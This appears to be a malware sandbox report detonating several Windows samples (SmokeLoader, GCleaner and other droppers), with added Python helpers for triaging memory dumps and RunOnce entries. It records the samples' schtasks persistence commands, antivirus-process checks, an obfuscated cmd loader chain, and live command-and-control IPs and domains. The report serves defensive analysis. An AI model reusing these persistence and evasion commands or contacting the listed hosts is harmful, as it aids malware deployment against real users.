SHA512 3b713c0ff53a7f88f628a90b30d59417bf5b92216666e4bd2f4c1cd502f338a1838c9691d5ee2830015b5f697ca811ee8e976d026c0d073b1487fb573b50a400

memory/596-305-0x0000000004A50000-0x0000000004B0D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\prefs.js

MD5 7e1d40cfcbf422515e7ebea025104a1e
SHA1 58ce283f0ae2cdb98e002bec56b678465bed9979
SHA256 1754c8e48374a911afbbc0f91e0d2cdd6f6d469afaa1c2b20c8ca9ff5370e4ea
SHA512 288a9a3977a4eb7a117a44f1137e12d32a7c5d6e6131276e07b334995b69778e6f4bd67587efa29e784b8f364cbf7052f8096de99999b1def62e504c0ec2e6d3

memory/596-291-0x0000000003720000-0x0000000003793000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 323206751e0a12e1797c91034bc1f8e4
SHA1 46ddc443c111fa9c2fc4dd65e310cfd817490067
SHA256 2e773f8a36cf95f9b9fee3b1eba765df147177788dd2ad631fd33cd79f103c0f
SHA512 5030c85c35c412c660ddd367ca65f2133542bb3b6e09f972581a5d2e8ad49a4f74901dd5ab9f6a26660388149d9a2b6950491224280c4c8fa6f420c54d9107b9

memory/1496-324-0x0000000001060000-0x0000000001F64000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\Service.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\Service.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\Service.exe

"C:\Users\Admin\AppData\Local\Temp\PL\Service.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

Network

Country Destination Domain Proto
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
FI 163.123.143.4:80 163.123.143.4 tcp
NL 107.182.129.251:80 107.182.129.251 tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 8.8.8.8:53 softs-portal.com udp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
US 8.8.8.8:53 4.143.123.163.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 251.129.182.107.in-addr.arpa udp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
US 8.8.8.8:53 12.143.123.163.in-addr.arpa udp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
US 8.8.8.8:53 vipsofts.xyz udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe"

Signatures

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 888 set thread context of 116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\find.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\find.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\at.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1632 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\at.exe
PID 1632 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\at.exe
PID 1632 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\at.exe
PID 1632 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\cmd.exe
PID 1632 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\cmd.exe
PID 1632 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\cmd.exe
PID 3296 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3296 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3296 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1200 wrote to memory of 3336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1200 wrote to memory of 3336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1200 wrote to memory of 3336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1200 wrote to memory of 400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1200 wrote to memory of 400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1200 wrote to memory of 400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1200 wrote to memory of 1664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1200 wrote to memory of 1664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1200 wrote to memory of 1664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1200 wrote to memory of 4264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1200 wrote to memory of 4264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1200 wrote to memory of 4264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1200 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1200 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1200 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1200 wrote to memory of 888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 1200 wrote to memory of 888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 1200 wrote to memory of 888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 1200 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1200 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1200 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3296 wrote to memory of 64 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3296 wrote to memory of 64 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3296 wrote to memory of 64 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 888 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 888 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 888 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 888 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 888 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 888 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 888 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 888 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

Processes

C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe

"C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe"

C:\Windows\SysWOW64\at.exe

at 3874982763784yhwgdfg78234789s42809374918uf

C:\Windows\SysWOW64\cmd.exe

cmd /c cmd < Film.aspx & ping -n 5 localhost

C:\Windows\SysWOW64\cmd.exe

cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "imagename eq AvastUI.exe"

C:\Windows\SysWOW64\find.exe

find /I /N "avastui.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "imagename eq AVGUI.exe"

C:\Windows\SysWOW64\find.exe

find /I /N "avgui.exe"

C:\Windows\SysWOW64\findstr.exe

findstr /V /R "^otPcqYaF$" Deliver.aspx

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

Tanks.exe.pif A

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 5

C:\Windows\SysWOW64\PING.EXE

ping -n 5 localhost

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 bDIATguLPNddTCYKKaxjQJVwvtXO.bDIATguLPNddTCYKKaxjQJVwvtXO udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
NL 109.206.241.33:80 tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 103.209.201.84.in-addr.arpa udp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Film.aspx

MD5 8eb593f08a4cca9959a469af6528ac0d
SHA1 8f4ae3c90b6d653eb75224683358f12dfc442dca
SHA256 7903967eca6727d611e46d666d2871d4438e9bc65ea185e01787c8a8a3e5ce70
SHA512 631403ca6e37a317158ba583e5b0f05e83157abc4cb4865f8d0d8f6e11ef39ab150fe948961aebcaff5c01ace0345ca6dc3882306ab0ce84eec6c1dfdf822ca9

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Deliver.aspx

MD5 701381da8e4a87f18a22b98eee09a22b
SHA1 f5ff5c1714155b853a8335b1d359a010c012c596
SHA256 8b21bc4f93cc9a8438ec08d1385f2d7dead6291a741fdfe7b6960c9f9917f6b3
SHA512 55ef35ce31c1fac2ff91efb3b4a5f646f3cfc7a0c4592f9da3e444a6472203608e224cf55dfa5c79025247c41aa8cbad759ef65dee9f95fe5c244dee239dc141

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Accurate.aspx

MD5 ffc713ff8173dac3c96bc583eb916705
SHA1 3c1b3e1eb258e304722ecc876820a470d491467d
SHA256 8d9c5d3eb7d4bfeb8ab1c5f4dde38dea52624ed80b188648fbab2ada88505ae4
SHA512 8af86a88e0bb60941ec5a55678c97f9a25518f2e140fc2e792115cb653b5f5a745630d970492565944116f3c5e5dc053c22b60ad8287ce5b921e47371125bc8f

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

MD5 6987e4cd3f256462f422326a7ef115b9
SHA1 71672a495b4603ecfec40a65254cb3ba8766bbe0
SHA256 3e26723394ade92f8163b5643960189cb07358b0f96529a477d37176d68aa0a0
SHA512 4b1d7f7ffee39a2d65504767beeddd4c3374807a93889b14e7e73db11e478492dec349aedca03ce828f21a66bb666a68d3735443f4249556e10825a4cd7dfeb4

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xEvsgieS.dll

MD5 4f3387277ccbd6d1f21ac5c07fe4ca68
SHA1 e16506f662dc92023bf82def1d621497c8ab5890
SHA256 767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac
SHA512 9da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219

memory/116-26-0x0000000000400000-0x0000000000435000-memory.dmp

memory/116-33-0x0000000000400000-0x0000000000435000-memory.dmp

memory/888-34-0x0000000000220000-0x000000000030B000-memory.dmp

memory/116-35-0x0000000000220000-0x000000000030B000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win7-20240729-en

Max time kernel

140s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Network

Country Destination Domain Proto
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp

Files

memory/2324-1-0x00000000002A0000-0x00000000003A0000-memory.dmp

memory/2324-2-0x0000000000400000-0x0000000000443000-memory.dmp

memory/2324-3-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2324-4-0x00000000002A0000-0x00000000003A0000-memory.dmp

memory/2324-5-0x0000000000400000-0x0000000000443000-memory.dmp

memory/2324-6-0x0000000000400000-0x000000000045E000-memory.dmp
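Every memory/ entry in this report is named memory/<pid>-<capture index>-0x<start>-0x<end>-memory.dmp. The six dumps above all come from one process (PID 2324, setup.exe) and only two regions, and the region at 0x400000 is captured at two different sizes (0x43000 and 0x5E000). 0x400000 is the default image base of a 32-bit PE, and the same base reappearing with a larger size is what an in-place unpack typically looks like, so the later, larger dump is the better starting point for static analysis. By the same rule, the 0x140000000 base for pb1115.exe in behavioral8 and behavioral7 marks a 64-bit image, which is also why WerFault in behavioral7 runs from system32 rather than SysWOW64. The following Python is an added example and not part of the sandbox report: it parses dump names, groups them by process and region, and applies those two checks. The sample names are copied from the list above; it works unchanged on any other memory/ list on this page.

```python
import re
from collections import defaultdict

# memory/<pid>-<capture index>-0x<start>-0x<end>-memory.dmp
DUMP_NAME = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)
# Linker default image bases: 32-bit and 64-bit PE.
DEFAULT_IMAGE_BASES = {0x400000: "32-bit", 0x140000000: "64-bit"}


def parse_dump_name(name):
    """Split one dump name into pid, capture index, region bounds and size."""
    m = DUMP_NAME.match(name.strip())
    if not m:
        return None
    start, end = int(m["start"], 16), int(m["end"], 16)
    return {"pid": int(m["pid"]), "seq": int(m["seq"]),
            "start": start, "end": end, "size": end - start}


def group_dumps(names):
    """Group dumps by (pid, region start), each group ordered by capture index."""
    groups = defaultdict(list)
    for n in names:
        d = parse_dump_name(n)
        if d is not None:
            groups[(d["pid"], d["start"])].append(d)
    for dumps in groups.values():
        dumps.sort(key=lambda d: d["seq"])
    return dict(groups)


def regions_that_changed_size(names):
    """Regions captured more than once with different sizes (distinct sizes in capture order)."""
    out = []
    for (pid, start), dumps in group_dumps(names).items():
        sizes = []
        for d in dumps:
            if d["size"] not in sizes:
                sizes.append(d["size"])
        if len(sizes) > 1:
            out.append({"pid": pid, "start": start, "sizes": sizes})
    return out


def image_dumps(names):
    """Last capture of each region that starts at a default PE image base."""
    return [(pid, DEFAULT_IMAGE_BASES[start], dumps[-1])
            for (pid, start), dumps in group_dumps(names).items()
            if start in DEFAULT_IMAGE_BASES]


# Dump names copied from the behavioral9 Files list (setup.exe, PID 2324).
BEHAVIORAL9_DUMPS = [
    "memory/2324-1-0x00000000002A0000-0x00000000003A0000-memory.dmp",
    "memory/2324-2-0x0000000000400000-0x0000000000443000-memory.dmp",
    "memory/2324-3-0x0000000000400000-0x000000000045E000-memory.dmp",
    "memory/2324-4-0x00000000002A0000-0x00000000003A0000-memory.dmp",
    "memory/2324-5-0x0000000000400000-0x0000000000443000-memory.dmp",
    "memory/2324-6-0x0000000000400000-0x000000000045E000-memory.dmp",
]

if __name__ == "__main__":
    for region in regions_that_changed_size(BEHAVIORAL9_DUMPS):
        print(f"pid {region['pid']} base {region['start']:#x} sizes "
              + ", ".join(f"{s:#x}" for s in region["sizes"]))
    for pid, arch, dump in image_dumps(BEHAVIORAL9_DUMPS):
        print(f"pid {pid}: {arch} image, analyse capture {dump['seq']} ({dump['size']:#x} bytes)")
```

For the list above this prints the 0x400000 region with sizes 0x43000 and 0x5E000, and selects capture 6 as the image dump to open in a disassembler.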

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\6523.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\PL\6523.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\6523.exe

"C:\Users\Admin\AppData\Local\Temp\PL\6523.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 168

Network

N/A

Files

memory/2276-1-0x0000000000890000-0x0000000000990000-memory.dmp

memory/2276-3-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2276-2-0x0000000000400000-0x0000000000409000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe N/A
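The RunOnce value above is the standard footprint of an IExpress (wextract) self-extracting package rather than persistence for the payload: the stub unpacks into %TEMP%\IXP000.TMP, runs the embedded command (here IXP000.TMP\SETUP_~1.EXE), and registers advpack.dll's DelNodeRunDLL32 export under RunOnce so that the extraction directory is deleted at the next logon. For a responder the consequence is that everything extracted there (SETUP_~1.EXE in this run, and the Deliver.aspx, Accurate.aspx, Tanks.exe.pif and xEvsgieS.dll files listed under IXP000.TMP in the earlier runs) disappears on reboot unless it is collected first. The following Python is an added example and not part of the sandbox report: it classifies RunOnce values and returns the directories to image before the host is restarted. The first sample value is the one the report shows Galaxy.exe writing (with the report's escaping removed); the other two are constructed for comparison and do not come from the report.

```python
import re

# Cleanup command that IExpress/WEXTRACT self-extractors register under RunOnce:
#   rundll32.exe <path>\advpack.dll,DelNodeRunDLL32 "<extraction dir>"
IEXPRESS_CLEANUP = re.compile(
    r'^rundll32(?:\.exe)?\s+'
    r'(?P<dll>\S*advpack\.dll),DelNodeRunDLL32\s+'
    r'"?(?P<target>[^"]+?)"?\s*$',
    re.IGNORECASE,
)
# wextract names its extraction directory IXP<nnn>.TMP under %TEMP%.
IXP_DIR = re.compile(r'\\IXP\d{3}\.TMP\\?$', re.IGNORECASE)
# ... and names the RunOnce value wextract_cleanup<n>.
WEXTRACT_VALUE = re.compile(r'^wextract_cleanup\d+$', re.IGNORECASE)


def classify_runonce(name, data):
    """Classify one RunOnce value (value name, REG_SZ data)."""
    m = IEXPRESS_CLEANUP.match(data.strip())
    if not m:
        return {"name": name, "kind": "other", "command": data}
    target = m.group("target")
    return {
        "name": name,
        "kind": "iexpress_cleanup" if IXP_DIR.search(target) else "advpack_delnode",
        "dll": m.group("dll"),
        "target": target,
        "wextract_name": bool(WEXTRACT_VALUE.match(name)),
    }


def dirs_to_collect(values):
    """Directories that a pending RunOnce entry will delete at the next logon.

    Copy them off the host before rebooting: the extracted payload lives there."""
    out = []
    for name, data in values:
        r = classify_runonce(name, data)
        if r["kind"] in ("iexpress_cleanup", "advpack_delnode"):
            out.append(r["target"])
    return out


# Constructed sample input. The first value is the one this report shows
# Galaxy.exe writing (single backslashes; the report prints them escaped).
# The other two are made up for comparison and are not from the report.
SAMPLE_RUNONCE = [
    ("wextract_cleanup0",
     r'rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"'),
    ("ConstructedInstallerCleanup",
     r'rundll32.exe advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\build"'),
    ("ConstructedBenign",
     r'"C:\Program Files\Example\updater.exe" /silent'),
]

if __name__ == "__main__":
    for name, data in SAMPLE_RUNONCE:
        print(classify_runonce(name, data))
    print("collect before reboot:", dirs_to_collect(SAMPLE_RUNONCE))
```

On a live host the (name, data) pairs come from HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce (and the HKCU equivalent); the classifier only looks at the string, so it works equally on a registry export or on a sandbox report.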

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe

"C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
